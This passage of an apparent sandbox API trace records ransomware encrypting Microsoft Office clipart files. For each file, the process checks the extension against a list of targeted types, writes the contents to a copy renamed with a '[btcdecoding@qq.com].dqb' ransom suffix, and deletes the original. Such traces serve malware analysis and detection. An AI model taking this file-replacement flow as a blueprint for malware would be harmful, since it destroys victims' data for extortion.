Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01186_.wmf")) returned 1 [0060.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63 [0060.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63 [0060.511] lstrlenW (lpString=".doc") returned 4 [0060.511] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.511] lstrlenW (lpString=".docx") returned 5 [0060.511] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0060.511] lstrlenW (lpString=".pdf") returned 4 [0060.511] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.511] lstrlenW (lpString=".xls") returned 4 [0060.511] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.512] lstrlenW (lpString=".xlsx") returned 5 [0060.512] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0060.512] lstrlenW (lpString=".ppt") returned 4 [0060.512] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63 [0060.512] lstrlenW (lpString=".zip") returned 4 [0060.512] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.512] lstrlenW (lpString=".rar") returned 4 [0060.512] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.512] lstrlenW (lpString=".bz2") returned 4 [0060.512] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.512] lstrlenW (lpString=".7z") returned 3 [0060.512] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63 [0060.512] lstrlenW (lpString=".dbf") returned 4 [0060.512] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63 [0060.512] lstrlenW (lpString=".1cd") returned 4 [0060.512] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63 [0060.512] lstrlenW (lpString=".jpg") returned 4 [0060.512] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.513] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.513] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.513] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01366_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0060.513] GetLastError () returned 0x0 [0060.513] ReadFile (in: hFile=0x158, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x6e8, lpOverlapped=0x0) returned 1 [0060.515] WriteFile (in: hFile=0x1a4, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x6f0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x6f0, lpOverlapped=0x0) returned 1 [0060.515] ReadFile (in: hFile=0x158, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0060.515] WriteFile (in: hFile=0x1a4, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.516] SetEndOfFile (hFile=0x1a4) returned 1 [0060.516] CloseHandle (hObject=0x1a4) returned 1 [0060.516] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.516] SetEndOfFile (hFile=0x158) returned 1 [0060.517] CloseHandle (hObject=0x158) returned 1 [0060.517] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0060.517] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01366_.wmf")) returned 1 [0060.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 63 [0060.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 63 [0060.517] lstrlenW (lpString=".doc") returned 4 [0060.517] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.517] lstrlenW (lpString=".docx") returned 5 [0060.517] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0060.517] lstrlenW (lpString=".pdf") returned 4 [0060.517] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.517] lstrlenW (lpString=".xls") returned 4 [0060.517] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.517] lstrlenW (lpString=".xlsx") returned 5 [0060.517] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0060.517] lstrlenW (lpString=".ppt") returned 4 [0060.517] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.517] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 63 [0060.517] lstrlenW (lpString=".zip") returned 4 [0060.517] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.518] lstrlenW (lpString=".rar") returned 4 [0060.518] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.518] lstrlenW (lpString=".bz2") returned 4 [0060.518] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.518] lstrlenW (lpString=".7z") returned 3 [0060.518] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 63 [0060.518] lstrlenW (lpString=".dbf") returned 4 [0060.518] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 63 [0060.518] lstrlenW (lpString=".1cd") returned 4 [0060.518] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.518] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 63 [0060.518] lstrlenW (lpString=".jpg") returned 4 [0060.518] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.519] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.519] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.519] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01434_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0060.519] GetLastError () returned 0x0 [0060.519] ReadFile (in: hFile=0x158, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x384, lpOverlapped=0x0) returned 1 [0060.521] WriteFile (in: hFile=0x1a4, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x390, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x390, lpOverlapped=0x0) returned 1 [0060.521] ReadFile (in: hFile=0x158, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0060.521] WriteFile (in: hFile=0x1a4, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.522] SetEndOfFile (hFile=0x1a4) returned 1 [0060.522] CloseHandle (hObject=0x1a4) returned 1 [0060.522] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.522] SetEndOfFile (hFile=0x158) returned 1 [0060.523] CloseHandle (hObject=0x158) returned 1 [0060.523] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0060.523] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01434_.wmf")) returned 1 [0060.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63 [0060.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63 [0060.523] lstrlenW (lpString=".doc") returned 4 [0060.523] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.523] lstrlenW (lpString=".docx") returned 5 [0060.523] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0060.523] lstrlenW (lpString=".pdf") returned 4 [0060.523] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.523] lstrlenW (lpString=".xls") returned 4 [0060.523] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.523] lstrlenW (lpString=".xlsx") returned 5 [0060.523] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0060.523] lstrlenW (lpString=".ppt") returned 4 [0060.523] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63 [0060.523] lstrlenW (lpString=".zip") returned 4 [0060.523] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.524] lstrlenW (lpString=".rar") returned 4 [0060.524] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.524] lstrlenW (lpString=".bz2") returned 4 [0060.524] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.524] lstrlenW (lpString=".7z") returned 3 [0060.524] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63 [0060.524] lstrlenW (lpString=".dbf") returned 4 [0060.524] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63 [0060.524] lstrlenW (lpString=".1cd") returned 4 [0060.524] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63 [0060.524] lstrlenW (lpString=".jpg") returned 4 [0060.524] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.524] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.524] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.524] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01585_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0060.525] GetLastError () returned 0x0 [0060.525] ReadFile (in: hFile=0x158, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x9dc, lpOverlapped=0x0) returned 1 [0060.527] WriteFile (in: hFile=0x1a4, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x9e0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x9e0, lpOverlapped=0x0) returned 1 [0060.528] ReadFile (in: hFile=0x158, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0060.528] WriteFile (in: hFile=0x1a4, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.528] SetEndOfFile (hFile=0x1a4) returned 1 [0060.528] CloseHandle (hObject=0x1a4) returned 1 [0060.528] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.528] SetEndOfFile (hFile=0x158) returned 1 [0060.529] CloseHandle (hObject=0x158) returned 1 [0060.529] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0060.529] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01585_.wmf")) returned 1 [0060.529] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63 [0060.529] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63 [0060.529] lstrlenW (lpString=".doc") returned 4 [0060.530] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.530] lstrlenW (lpString=".docx") returned 5 [0060.530] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0060.530] lstrlenW (lpString=".pdf") returned 4 [0060.530] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.530] lstrlenW (lpString=".xls") returned 4 [0060.530] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.530] lstrlenW (lpString=".xlsx") returned 5 [0060.530] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0060.530] lstrlenW (lpString=".ppt") returned 4 [0060.530] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63 [0060.530] lstrlenW (lpString=".zip") returned 4 [0060.530] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.530] lstrlenW (lpString=".rar") returned 4 [0060.530] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.530] lstrlenW (lpString=".bz2") returned 4 [0060.530] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.530] lstrlenW (lpString=".7z") returned 3 [0060.530] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63 [0060.530] lstrlenW (lpString=".dbf") returned 4 [0060.530] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63 [0060.530] lstrlenW (lpString=".1cd") returned 4 [0060.530] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63 [0060.530] lstrlenW (lpString=".jpg") returned 4 [0060.530] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.531] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.531] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.531] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01586_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0060.531] GetLastError () returned 0x0 [0060.531] ReadFile (in: hFile=0x158, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x914, lpOverlapped=0x0) returned 1 [0060.533] WriteFile (in: hFile=0x1a4, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x920, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x920, lpOverlapped=0x0) returned 1 [0060.533] ReadFile (in: hFile=0x158, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0060.534] WriteFile (in: hFile=0x1a4, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.534] SetEndOfFile (hFile=0x1a4) returned 1 [0060.534] CloseHandle (hObject=0x1a4) returned 1 [0060.534] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.534] SetEndOfFile (hFile=0x158) returned 1 [0060.535] CloseHandle (hObject=0x158) returned 1 [0060.535] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0060.535] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01586_.wmf")) returned 1 [0060.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63 [0060.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63 [0060.535] lstrlenW (lpString=".doc") returned 4 [0060.535] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.535] lstrlenW (lpString=".docx") returned 5 [0060.535] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0060.535] lstrlenW (lpString=".pdf") returned 4 [0060.535] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.535] lstrlenW (lpString=".xls") returned 4 [0060.535] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.535] lstrlenW (lpString=".xlsx") returned 5 [0060.535] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0060.535] lstrlenW (lpString=".ppt") returned 4 [0060.535] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63 [0060.536] lstrlenW (lpString=".zip") returned 4 [0060.536] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.536] lstrlenW (lpString=".rar") returned 4 [0060.536] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.536] lstrlenW (lpString=".bz2") returned 4 [0060.536] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.536] lstrlenW (lpString=".7z") returned 3 [0060.536] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63 [0060.536] lstrlenW (lpString=".dbf") returned 4 [0060.536] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63 [0060.536] lstrlenW (lpString=".1cd") returned 4 [0060.536] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63 [0060.536] lstrlenW (lpString=".jpg") returned 4 [0060.536] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.536] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.536] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.536] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01628_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0060.537] GetLastError () returned 0x0 [0060.537] ReadFile (in: hFile=0x158, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x4a7c, lpOverlapped=0x0) returned 1 [0060.538] WriteFile (in: hFile=0x1a4, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x4a80, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x4a80, lpOverlapped=0x0) returned 1 [0060.540] ReadFile (in: hFile=0x158, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0060.540] WriteFile (in: hFile=0x1a4, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.540] SetEndOfFile (hFile=0x1a4) returned 1 [0060.540] CloseHandle (hObject=0x1a4) returned 1 [0060.540] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.540] SetEndOfFile (hFile=0x158) returned 1 [0060.541] CloseHandle (hObject=0x158) returned 1 [0060.541] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0060.541] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01628_.wmf")) returned 1 [0060.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63 [0060.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63 [0060.541] lstrlenW (lpString=".doc") returned 4 [0060.541] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.541] lstrlenW (lpString=".docx") returned 5 [0060.541] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0060.541] lstrlenW (lpString=".pdf") returned 4 [0060.541] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.542] lstrlenW (lpString=".xls") returned 4 [0060.542] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.542] lstrlenW (lpString=".xlsx") returned 5 [0060.542] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0060.542] lstrlenW (lpString=".ppt") returned 4 [0060.542] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63 [0060.542] lstrlenW (lpString=".zip") returned 4 [0060.542] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.542] lstrlenW (lpString=".rar") returned 4 [0060.542] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.542] lstrlenW (lpString=".bz2") returned 4 [0060.542] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.542] lstrlenW (lpString=".7z") returned 3 [0060.542] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63 [0060.542] lstrlenW (lpString=".dbf") returned 4 [0060.542] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63 [0060.542] lstrlenW (lpString=".1cd") returned 4 [0060.542] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01628_.WMF") returned 63 [0060.542] lstrlenW (lpString=".jpg") returned 4 [0060.542] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 